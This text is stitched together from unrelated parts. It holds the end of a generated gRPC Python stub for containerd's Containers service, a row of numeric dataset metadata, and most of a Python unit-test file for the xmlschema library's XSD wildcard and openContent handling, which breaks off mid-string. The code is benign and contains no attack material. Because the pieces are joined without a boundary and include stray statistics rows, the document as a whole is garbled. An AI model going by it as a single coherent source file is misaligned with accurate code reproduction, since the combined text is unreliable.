response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'containerd.services.containers.v1.Containers', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Containers(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Get',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/List',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/containerd.services.containers.v1.Containers/ListStream',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Create',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Update',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Delete',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
| 52.370909 | 148 | 0.72108 | 1,550 | 14,402 | 6.374194 | 0.106452 | 0.089474 | 0.072267 | 0.082591 | 0.904352 | 0.900304 | 0.886336 | 0.858401 | 0.821862 | 0.821862 | 0 | 0.007845 | 0.22108 | 14,402 | 274 | 149 | 52.562044 | 0.872883 | 0.204694 | 0 | 0.513369 | 1 | 0 | 0.087131 | 0.059395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074866 | false | 0 | 0.016043 | 0.032086 | 0.139037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
538a025b66c16a1ebbaab61111a1b8fbef70914c | 34,303 | py | Python | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 176 | 2019-07-08T00:15:03.000Z | 2022-03-24T14:17:42.000Z | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 168 | 2019-07-01T14:49:03.000Z | 2022-03-28T10:55:38.000Z | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 44 | 2019-08-21T22:59:02.000Z | 2022-02-28T08:50:13.000Z | #!/usr/bin/env python
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
import unittest
from xmlschema import XMLSchemaParseError
from xmlschema.validators import XMLSchema11, XsdDefaultOpenContent
from xmlschema.testing import XsdValidatorTestCase
class TestXsdWildcards(XsdValidatorTestCase):
def test_parsing(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace=" ##any "/>
<xs:any namespace="##local"/>
<xs:any namespace="##other"/>
<xs:any namespace="##targetNamespace foo bar"/>
<xs:any namespace="##local foo bar"/>
<xs:any namespace="##targetNamespace ##local foo bar"/>
</xs:choice>
</xs:group>
</xs:schema>""")
self.assertEqual(schema.groups['group1'][0].namespace, ('##any',))
self.assertEqual(schema.groups['group1'][1].namespace, [''])
self.assertEqual(schema.groups['group1'][2].namespace, ['##other'])
self.assertEqual(schema.groups['group1'][3].namespace, ['tns1', 'foo', 'bar'])
self.assertEqual(schema.groups['group1'][4].namespace, ['', 'foo', 'bar'])
self.assertEqual(schema.groups['group1'][5].namespace, ['tns1', '', 'foo', 'bar'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace="##all"/>
<xs:any processContents="any"/>
</xs:choice>
</xs:group>
</xs:schema>""", validation='lax')
errors = schema.all_errors
self.assertIn("wrong value '##all' in 'namespace' attribute", str(errors[1]))
self.assertIn("value must be one of ['skip'", str(errors[0]))
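The namespace-token mappings asserted above can be sketched as a small standalone helper (hypothetical, not part of xmlschema's API): `##local` maps to the empty namespace `''`, `##targetNamespace` to the schema's target namespace, `##any` stands alone, and other tokens pass through unchanged.

```python
def parse_wildcard_namespace(value, target_namespace):
    """Expand xs:any 'namespace' tokens the way the assertions above expect."""
    tokens = value.split()
    if tokens == ['##any']:
        return ('##any',)
    result = []
    for tok in tokens:
        if tok == '##local':
            result.append('')  # ##local -> empty namespace
        elif tok == '##targetNamespace':
            result.append(target_namespace)
        else:
            result.append(tok)  # '##other' and plain URIs pass through
    return result
```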
def test_overlap(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace="##local"/>
<xs:any namespace="##other"/>
<xs:any namespace="##targetNamespace foo bar"/>
</xs:choice>
</xs:group>
</xs:schema>""")
any1, any2, any3 = schema.groups['group1'][:]
self.assertFalse(any1.is_overlap(any2))
self.assertFalse(any2.is_overlap(any1))
self.assertTrue(any3.is_matching('{foo}x'))
self.assertTrue(any3.is_matching('{bar}x'))
self.assertTrue(any3.is_matching('{tns1}x'))
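The `is_matching` checks above operate on extended (Clark-notation) names like `'{foo}x'`. A minimal sketch of that matching logic, assuming the wildcard carries an explicit namespace list (helper names are illustrative, not xmlschema API):

```python
def clark_namespace(name):
    """Extract the namespace URI from an extended name: '{foo}x' -> 'foo'."""
    return name[1:name.index('}')] if name.startswith('{') else ''

def wildcard_is_matching(namespaces, name):
    """True if the name's namespace is admitted by the wildcard's list."""
    return clark_namespace(name) in namespaces
```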
def test_any_wildcard(self):
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ['##other'])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, [''])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="ns ##targetNamespace" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ['ns', ''])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="tns2 tns1 tns3" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace,
['tns2', 'tns1', 'tns3'])
self.assertEqual(schema.types['taggedType'].content[-1].min_occurs, 1)
self.assertEqual(schema.types['taggedType'].content[-1].max_occurs, 1)
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any minOccurs="10" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ('##any',))
self.assertEqual(schema.types['taggedType'].content[-1].min_occurs, 10)
self.assertIsNone(schema.types['taggedType'].content[-1].max_occurs)
def test_any_attribute_wildcard(self):
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute namespace="tns1:foo"/>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, ['tns1:foo'])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute namespace="##targetNamespace"/>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, [''])
def test_namespace_variants(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="urn:a" processContents="skip"/>
<xs:any namespace="" processContents="lax"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
any1 = schema.groups['group1'][0]
self.assertEqual(any1.namespace, ['urn:a'])
any2 = schema.groups['group1'][1]
self.assertEqual(any2.namespace, [])
class TestXsd11Wildcards(TestXsdWildcards):
schema_class = XMLSchema11
def test_parsing(self):
super(TestXsd11Wildcards, self).test_parsing()
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any notNamespace="##all"/>
</xs:choice>
</xs:group>
</xs:schema>""", validation='lax')
errors = schema.all_errors
self.assertIn("wrong value '##all' in 'notNamespace' attribute", str(errors[0]))
def test_is_restriction(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns1="tns1"
targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<!-- Case #1 -->
<xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1 tns2"/>
<xs:any notNamespace="tns1 tns2 tns3"/>
<!-- Case #2 -->
<xs:any namespace="##any"/>
<xs:any namespace="##local" notQName="a b"/>
<xs:any namespace="##local" notQName="##defined a b"/>
<!-- Case #3 -->
<xs:any namespace="##any" notQName="a b c d"/>
<xs:any namespace="##local" notQName="a b e"/>
<xs:any notNamespace="##local" notQName="tns1:c d e"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
any1, any2, any3 = schema.groups['group1'][:3]
self.assertEqual(repr(any1), "Xsd11AnyElement(not_namespace=['tns1'], "
"process_contents='strict', occurs=[1, 1])")
self.assertEqual(repr(any2), "Xsd11AnyElement(not_namespace=['tns1', 'tns2'], "
"process_contents='strict', occurs=[1, 1])")
self.assertTrue(any1.is_restriction(any1))
self.assertFalse(any1.is_restriction(any2))
self.assertFalse(any1.is_restriction(any3))
self.assertTrue(any2.is_restriction(any1))
self.assertTrue(any2.is_restriction(any2))
self.assertFalse(any2.is_restriction(any3))
self.assertTrue(any3.is_restriction(any1))
self.assertTrue(any3.is_restriction(any2))
self.assertTrue(any3.is_restriction(any3))
any1, any2, any3 = schema.groups['group1'][3:6]
self.assertEqual(repr(any1), "Xsd11AnyElement(namespace=('##any',), "
"process_contents='strict', occurs=[1, 1])")
self.assertEqual(repr(any2), "Xsd11AnyElement(namespace=[''], "
"process_contents='strict', occurs=[1, 1])")
self.assertTrue(any1.is_restriction(any1))
self.assertTrue(any2.is_restriction(any1))
self.assertTrue(any3.is_restriction(any1))
any1, any2, any3 = schema.groups['group1'][6:9]
self.assertFalse(any2.is_restriction(any1))
self.assertTrue(any3.is_restriction(any1))
def test_wildcard_union(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
<xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
<xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
<xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
# <xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][:2]
self.assertListEqual(any1.namespace, ['tns1'])
any1.union(any2)
self.assertListEqual(any1.namespace, ['tns1', 'tns2'])
# <xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][2:4]
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
any1.union(any2)
self.assertListEqual(any1.not_namespace, ['tns1'])
any2.union(any1)
self.assertListEqual(any2.not_namespace, ['tns1'])
# <xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][4:6]
any1.union(any2)
self.assertEqual(any1.namespace, ('##any',))
self.assertEqual(any1.not_namespace, ())
# <xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][6:8]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
# <xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
any1, any2 = schema.groups['group1'][8:10]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
any1, any2 = schema.groups['group1'][10:12]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['', 'tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
any1, any2 = schema.groups['group1'][12:14]
any1.union(any2)
self.assertListEqual(any1.namespace, ['##any'])
self.assertListEqual(any1.not_namespace, [])
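The set algebra behind these in-place `union` calls can be reduced, for the two simplest cases exercised above, to plain list operations. This is an illustrative sketch of the semantics, not the `Xsd11AnyElement` implementation: unioning two explicit lists merges them, while unioning two negated wildcards keeps only the namespaces both exclude (not(A) | not(B) == not(A & B)).

```python
def namespace_union(ns1, ns2):
    """Union of two explicit namespace lists, keeping first-seen order."""
    return ns1 + [ns for ns in ns2 if ns not in ns1]

def negated_union(not1, not2):
    """Union of two negated wildcards excludes only what both exclude."""
    return [ns for ns in not1 if ns in not2]
```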
def test_wildcard_intersection(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
<xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
<xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
<xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
<xs:any namespace="##any" notQName="##defined qn1"/>
<xs:any namespace="##local" notQName="##defined"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
# <xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][:2]
self.assertListEqual(any1.namespace, ['tns1'])
any1.intersection(any2)
self.assertListEqual(any1.namespace, ['tns1'])
# <xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][2:4]
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
any1.intersection(any2)
self.assertListEqual(any1.not_namespace, ['tns1', 'tns2'])
any2.intersection(any1)
self.assertListEqual(any2.not_namespace, ['tns1', 'tns2'])
# <xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][4:6]
any1.intersection(any2)
self.assertEqual(any1.namespace, [])
self.assertEqual(any1.not_namespace, ['tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][6:8]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1', ''])
# <xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
any1, any2 = schema.groups['group1'][8:10]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1', ''])
# <xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
any1, any2 = schema.groups['group1'][10:12]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['', 'tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
any1, any2 = schema.groups['group1'][12:14]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns2', 'tns1', ''])
# <xs:any namespace="##any" notQName="##defined qn1"/>
# <xs:any namespace="##local" notQName="##defined"/>
any1, any2 = schema.groups['group1'][14:16]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [''])
self.assertListEqual(any1.not_qname, ['##defined', 'qn1'])
def test_open_content_mode_interleave(self):
schema = self.check_schema("""
<xs:element name="Book">
<xs:complexType>
<xs:openContent mode="interleave">
<xs:any />
</xs:openContent>
<xs:sequence>
<xs:element name="Title" type="xs:string"/>
<xs:element name="Author" type="xs:string" />
<xs:element name="Date" type="xs:gYear"/>
<xs:element name="ISBN" type="xs:string"/>
<xs:element name="Publisher" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>""")
self.assertEqual(schema.elements['Book'].type.open_content.mode, 'interleave')
self.assertEqual(schema.elements['Book'].type.open_content.any_element.min_occurs, 0)
self.assertIsNone(schema.elements['Book'].type.open_content.any_element.max_occurs)
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'interleave')
self.check_schema("""
<xs:complexType name="name">
<xs:openContent />
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_mode_suffix(self):
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'suffix')
self.assertEqual(schema.types['name'].open_content.any_element.min_occurs, 0)
self.assertIsNone(schema.types['name'].open_content.any_element.max_occurs)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_mode_none(self):
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="none"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'none')
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="none">
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_allowed(self):
self.check_schema("""
<xs:complexType name="choiceType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:choice>
<xs:element name="a" type="xs:float"/>
<xs:element name="b" type="xs:string"/>
<xs:element name="c" type="xs:int"/>
</xs:choice>
</xs:complexType>""")
def test_open_content_not_allowed(self):
self.check_schema("""
<xs:complexType name="wrongType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:simpleContent>
<xs:restriction base="xs:string" />
</xs:simpleContent>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="wrongType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:complexContent>
<xs:restriction base="xs:anyType" />
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:element name="root" />
</xs:schema>""")
def test_open_content_wrong_attributes(self):
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="wrong"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any minOccurs="1" namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any maxOccurs="1000" namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_default_open_content(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
self.assertIsInstance(schema.default_open_content, XsdDefaultOpenContent)
self.assertFalse(schema.default_open_content.applies_to_empty)
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent appliesToEmpty="true">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
self.assertTrue(schema.default_open_content.applies_to_empty)
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent appliesToEmpty="wrong">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent mode="wrong">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent mode="none" />
</xs:schema>""")
def test_open_content_restriction(self):
schema = self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:restriction base="baseType">
<xs:openContent>
<xs:any namespace="tns1" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:restriction>
</xs:complexContent>
</xs:complexType>""")
self.assertEqual(schema.types['derivedType'].content[0].name, 'foo')
self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:restriction base="baseType">
<xs:openContent>
<xs:any namespace="##any" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:restriction>
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_extension(self):
schema = self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent mode="suffix">
<xs:any namespace="tns1" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:extension base="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="bar" type="xs:string"/>
</xs:sequence>
</xs:extension>
</xs:complexContent>
</xs:complexType>""")
self.assertEqual(schema.types['derivedType'].content[0][0].name, 'foo')
self.assertEqual(schema.types['derivedType'].content[1][0].name, 'bar')
self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent mode="interleave">
<xs:any namespace="tns1" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:extension base="baseType">
<xs:openContent>
<!-- processContents="strict" is more restrictive -->
<xs:any namespace="tns1 tns2" processContents="strict"/>
</xs:openContent>
<xs:sequence>
<xs:element name="bar" type="xs:string"/>
</xs:sequence>
</xs:extension>
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
def test_not_qname_attribute(self):
self.assertIsInstance(self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:ns="tns1" targetNamespace="tns1">
<xs:complexType name="type1">
<xs:openContent>
<xs:any notQName="ns:a" processContents="lax" />
</xs:openContent>
</xs:complexType>
</xs:schema>"""), XMLSchema11)
self.assertIsInstance(self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
